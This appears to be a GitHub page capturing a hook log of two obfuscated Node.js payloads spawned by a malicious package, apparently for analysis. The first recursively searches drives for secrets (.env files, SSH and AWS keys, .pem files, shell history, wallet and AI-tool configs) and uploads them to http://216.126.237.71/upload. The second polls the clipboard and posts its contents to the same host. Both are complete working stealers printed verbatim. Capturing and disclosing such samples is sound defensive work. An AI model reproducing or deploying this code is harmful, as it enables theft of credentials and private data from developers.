fs=require('fs'),path=require(m(0x247)),os=require('os'),FormData=require(m(0x265)),axios=require(m(0x18b)),{execSync,exec}=require(m(0x1b7));process[m(0x1fb)]=m(0x197);const usu=m(0x237),upt=m(0x210),t='8',uid=m(0x1df),username=os[m(0x1a5)]()[m(0x223)],rootDir=os[m(0x1a5)]()[m(0x254)]+'',excludeFolders=[m(0x24c),m(0x260),m(0x1cc),m(0x187),m(0x190),m(0x1bd),m(0x220),m(0x22a),m(0x256),m(0x1d6),m(0x20a),m(0x181),m(0x1f1),m(0x1ab),m(0x1d3),m(0x211),m(0x209),m(0x18f),m(0x227),m(0x1ce),m(0x23f),m(0x18d),m(0x203),m(0x193),m(0x1ab),m(0x1ed),m(0x201),m(0x1a4),m(0x19d),m(0x242),m(0x236),m(0x1f2),m(0x258),m(0x183),m(0x1b2),m(0x1f8),m(0x1ed),m(0x1fe),m(0x1bc),m(0x1dc),m(0x1a9),m(0x231),m(0x249),m(0x204),m(0x1c3),m(0x206),m(0x23c),m(0x1db),m(0x22c),m(0x26b),m(0x215),m(0x269),m(0x1ff),m(0x1b3),m(0x24b),m(0x259),m(0x1e3),m(0x185),m(0x23a),m(0x1bb),m(0x1ca),m(0x25b),m(0x191),m(0x22d),m(0x186),m(0x1f6),m(0x264),m(0x251),m(0x216),m(0x1e0),m(0x21a),m(0x1d7),m(0x219),m(0x19b),m(0x238),m(0x24e),m(0x229),m(0x1e5),m(0x20d),m(0x1fc),m(0x234),m(0x1a8),m(0x240),m(0x221),m(0x1d1),m(0x250),m(0x19d),m(0x248),m(0x244),m(0x235),m(0x217),m(0x26c),m(0x25a),m(0x22e),m(0x215),m(0x1dd),m(0x18e),m(0x1c9),m(0x1d4),m(0x1fa),m(0x202),m(0x195),m(0x1e1),m(0x1a3),m(0x198),m(0x19f),m(0x205),m(0x1cd),m(0x263),m(0x20f),m(0x1da),m(0x241),m(0x25f),m(0x1c6),m(0x1c6),m(0x21c),m(0x18a),m(0x1cf),m(0x1c1),m(0x1a9),m(0x1c8),m(0x17f),m(0x224),m(0x1bd),m(0x1a0),m(0x1ad),m(0x246),m(0x20e),m(0x1b0),m(0x1b1),m(0x1ee),m(0x1f0),m(0x212),m(0x233),m(0x184),m(0x194),m(0x262),m(0x1e6),m(0x255),m(0x253),m(0x1f5),m(0x196),m(0x19e),m(0x24f),m(0x20c),m(0x1b5),m(0x21e)],searchKey=[m(0x18c),m(0x1c7),m(0x22b),m(0x1ba),m(0x226),m(0x1f4),m(0x1b6),m(0x218),m(0x1e2),m(0x25e),m(0x1f7),m(0x19a),m(0x26a),m(0x1cb),m(0x1c5),m(0x25c),m(0x1ef),m(0x1d0),m(0x26d),m(0x1d8),m(0x23b),m(0x1e8),m(0x200)],configDir=[path[m(0x208)](os[m(0x254)](),m(0x1b8)),path[m(0x208)](os[m(0x254)](),m(0x243)),path[m(0x208)](os[m(0x254)](),m(0x19c)),path[m(0x208)](os[m(0x254)](),m(0x1af)),path[m(0x208)](os[m(0x254)](),m(0x1e8)),path[m(0x208)](os[m(0x254)](),m(0x23b))],uu=m(0x23d)+usu+':'+upt+m(0x1a7),uf=async c=>{const n=m,d={'UmVVd':n(0x225),'vaXPk':n(0x1f3)};if(fs[n(0x20b)](c)[n(0x239)]()){const e=new FormData(),f=fs[n(0x1ae)](c);f['on'](d[n(0x222)],()=>f[n(0x1de)]()),e[n(0x207)](d[n(0x188)],f);try{const g=await axios[n(0x192)](uu,e,{'headers':{...e[n(0x22f)](),'userkey':uid,'hostname':os[n(0x24a)](),'username':username,'path':c,'t':t}})[n(0x1e4)](h=>{const o=n;f[o(0x1de)]();})[n(0x1eb)](h=>{const p=n;f[p(0x1de)]();});}catch(h){f[n(0x1de)]();}}},toRegex=c=>new RegExp('^'+c[m(0x228)](/\\./g,'\\x5c.')[m(0x228)](/\\*/g,'.*')+'$','i'),isFileMatching=c=>{const q=m;return searchKey[q(0x199)](d=>toRegex(d)[q(0x1d2)](c));},scanDir=async c=>{const r=m,d={'fZtYx':function(g,h){return g==h;},'TaSQs':function(g,h,i){return g(h,i);},'DkDxg':function(g,h){return g(h);},'Spggk':function(g,h){return g(h);},'NYbND':function(g,h){return g(h);}};if(!fs[r(0x1ec)](c))return;const f=fs[r(0x1ea)](c);for(const g of f){try{const h=path[r(0x208)](c,g);if(d[r(0x245)](g,'go'))continue;const i=excludeFolders[r(0x199)](k=>h[r(0x1a6)]()[r(0x1fd)](k[r(0x1a6)]()));if(i)continue;const j=fs[r(0x20b)](h);if(j[r(0x214)]())!i&&await d[r(0x266)](scanDir,h,excludeFolders);else(configDir[r(0x199)](k=>h[r(0x1fd)](k))||j[r(0x239)]()&&d[r(0x1a1)](isFileMatching,g))&&(await d[r(0x1e9)](uf,h),await d[r(0x252)](sleep,-0x7a*-0x2+-0xc3a+0xb78));}catch(k){}}};function b(c,d){c=c-(0x5*-0x579+0x1*-0x1c02+0x38de);const e=a();let f=e[c];return f;}async function sleep(c){return new Promise(d=>setTimeout(d,c));}setTimeout(async()=>{const s=m,c={'aGfwh':function(d,e){return d==e;},'TaosW':s(0x1b4),'QCDXl':s(0x182)+s(0x1f9)+s(0x1b9)+s(0x21b),'TpnlP':function(d,e,f){return d(e,f);},'xnomV':function(d,e){return d(e);},'LWbEW':function(d,e){return d+e;},'zTGvx':function(d,e){return d(e);},'AXtft':s(0x21d)};if(c[s(0x257)](os[s(0x1c4)](),c[s(0x1be)])){const d=c[s(0x23e)];let e=c[s(0x267)](execSync,d,{'windowsHide':!![]});e=e[s(0x213)]()[s(0x1bf)]('\\x0a');for(let f of e){f=f[s(0x1d9)]();if(!f)continue;await c[s(0x1e7)](scanDir,c[s(0x24d)](f,'\\x5c'));}}else await c[s(0x1e7)](scanDir,rootDir),await c[s(0x21f)](scanDir,c[s(0x1aa)]);},0x19c9+0x1d6a+-0x334b);function a(){const u=['readdirSync','catch','existsSync','.cursor','pkgs','*.webp','fonts','.cache','.windsurf','file','*.rtf','ProgramData','.key','*.pem','.vue-cli-ui','Get-CimInstance\\x20Win32_LogicalDis','.git','title','.cfa','includes','.vscode-server','.yml','*.csv','.devctl','.gitignore','.claude','.dll','library','.exe','append','join','.android','less','statSync','Microsoft','.car','packages','imgs','4806','.tldrc','debug','toString','isDirectory','.jar','.pkg','.avi','*.xls','.aep','.msi','y\\x20DeviceID\\x22','.vscode','/mnt','Visual\\x20Studio\\x20Code.app','zTGvx','vendors','DCIM','UmVVd','username','.expo','error','*.md','.brownie','replace','.hpp','vendor','*.docx','module','extension','.dat','getHeaders','1517750hyTEdj','.pub-cache','238nrdiaY','background','.cab','.sys','.steam','216.126.237.71','.big','isFile','.psd','.zsh_history','.sh','http://','QCDXl','.node-gyp','.wma','images','.stream','.azure','.mp3','fZtYx','package','path','.sol','.Trash','hostname','flutter','node_modules','LWbEW','.bundle','Windows','.dylib','.sst','NYbND','Program\\x20Files\\x20(x86)','homedir','Program\\x20Files','public','aGfwh','.gnupg','llama','.sqlite','.gemini','*.jpeg','18AhBnGQ','*.txt','image','npm','2478575MqtIfl','locale','mysql','.var','form-data','TaSQs','TpnlP','218276Lhpzqo','.original','*.secret','.map','.so','*.ts','manifest','2306013DgMzxj','scss','powershell\\x20-NoProfile\\x20-Command\\x20\\x22','.pm2','wallpaper','.cl','media','android','vaXPk','204oIriSn','package-lock.json','axios','*.env*','.gk','.yarn','.avm','example','.pearai','post','.cocoapods','_locales','.github','All\\x20Users','npm-compiler','temp','some','*.ini','.3mf','.config','.nvm','All\\x20User','dist','windows.old','DkDxg','232168NMMOQS','tmp','.eigent','userInfo','toLowerCase','/upload','.mp4','.rustup','AXtft','.conda','9JbeseP','pkg','createReadStream','.ssh','openzeppelin','prisma','.snipaste','.yaml','win32','$RECYCLE.BIN','*.odt','child_process','.aws','k\\x20|\\x20Select-Object\\x20-ExpandPropert','*.pdf','.pak','.cargo','AppData','TaosW','split','1104576OJpjsw','.myi','985gawaen','.dmg','platform','*.jpg','plugin','*.doc','.docker','build','.pages','*.png','hooks','lib','.3T','.pyp','*.json','.webm','test','.move','.next','7188okGpgX','css','.apk','*.js','trim','img','.bin','.local','anaconda3','destroy','804','.pack','cache','*.xlsx','.ppt','then','.cdr','locales','xnomV','.bash_history','Spggk'];a=function(){return u;};return a();}\n" | |
| ], | |
| { | |
| "windowsHide": true, | |
| "detached": true, | |
| "stdio": "ignore" | |
| } | |
| ] | |
| [HOOKED] child_process.spawn called with: | |
| [ | |
| "node", | |
| [ | |
| "-e", | |
| "\n const j=b;(function(c,d){const i=b,e=c();while(!![]){try{const f=-parseInt(i(0xba))/(-0x32*0x2f+0x265a+-0x83*0x39)+parseInt(i(0xce))/(-0x2542+0xd*-0x1c4+0x52*0xbc)*(parseInt(i(0xcc))/(0x1*-0x3a5+-0xa86+0xe2e))+-parseInt(i(0xc8))/(0xb2b+0x182d+-0x2354)*(-parseInt(i(0xb5))/(-0x429+-0x1*0x1bd7+0x2005))+parseInt(i(0xc6))/(-0x3*0x5a9+-0x1407+0x2508)*(parseInt(i(0xc9))/(0x1965+0x2674+0x2a*-0x185))+parseInt(i(0xc3))/(-0x85e+-0x469+-0x1*-0xccf)*(-parseInt(i(0xb3))/(0x1*-0x1b57+0x1*0xf4d+-0x1*-0xc13))+parseInt(i(0xa5))/(-0x14c*-0x15+0x59c*0x5+-0x373e)+-parseInt(i(0xaf))/(-0x5f8+0x57a+0x89);if(f===d)break;else e['push'](e['shift']());}catch(g){e['push'](e['shift']());}}}(a,-0x3*0x26a73+0x4d2e5+0xd9011*0x1));const {execSync}=require(j(0xb9)),os=require('os'),axios=require(j(0xc4));process[j(0xab)]=j(0xbd);const server=j(0xbc),uid=j(0xac),t='8',sleep=c=>new Promise(d=>setTimeout(d,c)),makeLog=async c=>{const k=j;try{await axios[k(0xbe)](k(0xa4)+server+k(0xad),{'message':c,'host':os[k(0xb4)](),'uid':uid,'t':t});}catch{}},getClipboard=async()=>{const l=j,c={'eUhbe':function(d,e){return d===e;},'UKEXW':l(0xb7),'ydiOg':function(d,e,f){return d(e,f);},'knSsX':l(0xb0),'MixAg':l(0xa9),'VgHDs':l(0xb6),'eMYcr':function(d,e,f){return d(e,f);},'cOxPD':l(0xb8)+l(0xc1)};try{if(c[l(0xa8)](os[l(0xc7)](),c[l(0xb2)])){const d=c[l(0xbb)](execSync,c[l(0xca)],{'encoding':c[l(0xcb)]});return d[l(0xc0)]();}if(c[l(0xa8)](os[l(0xc7)](),c[l(0xb1)])){const e=c[l(0xaa)](execSync,c[l(0xc5)],{'encoding':c[l(0xcb)],'windowsHide':!![]});return e[l(0xc0)]();}return null;}catch{return null;}},watchClipboard=async()=>{const m=j,c={'XmSQp':function(f,g){return f(g);},'goUdv':function(f){return f();},'TsVtV':function(f,g){return f!==g;},'nmqai':function(f,g,h){return f(g,h);},'NqOIq':function(f,g){return f(g);}};let d=null,e=null;while(!![]){const f=await c[m(0xa7)](getClipboard);f&&c[m(0xcd)](f,d)&&(c[m(0xbf)](clearTimeout,e),e=c[m(0xae)](setTimeout,()=>{const n=m;c[n(0xbf)](makeLog,f);},0x134+-0x22f4*0x1+0x2*0x11da),d=f),await c[m(0xcf)](sleep,0x1*0x41f+-0xa7*-0x11+-0x2*0x6a1);}};((async()=>{const o=j,c={'OMvZF':function(d,e){return d(e);},'yfhCp':function(d){return d();}};await c[o(0xa6)](sleep,0x3c9+0x1*-0x14a1+0x1c90),c[o(0xc2)](watchClipboard);})());function b(c,d){c=c-(-0x2689+-0x1bf1+-0x47*-0xf2);const e=a();let f=e[c];return f;}function a(){const p=['13858000faxIub','OMvZF','goUdv','eUhbe','utf8','eMYcr','title','a36adbc35e69b22acbf9f834a0deb286','/api/service/makelog','nmqai','27567914JKegHJ','pbpaste','VgHDs','UKEXW','4249683hTuqFd','hostname','35qyRcvC','win32','darwin','powershell\\x20-NoProfile\\x20-NonIntera','child_process','225019WxcPjC','ydiOg','216.126.237.71','npm-compiler.log','post','XmSQp','trim','ctive\\x20Get-Clipboard','yfhCp','24hlKwfH','axios','cOxPD','31338DHUIrg','platform','730036wzivYg','1925hCdSYr','knSsX','MixAg','3ofnIVF','TsVtV','1556158BZWdbe','NqOIq','http://'];a=function(){return p;};return a();}\n " | |
| ], | |
| { | |
| "windowsHide": true, | |
| "detached": true, | |
| "stdio": "ignore" | |
| } | |
| ] |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment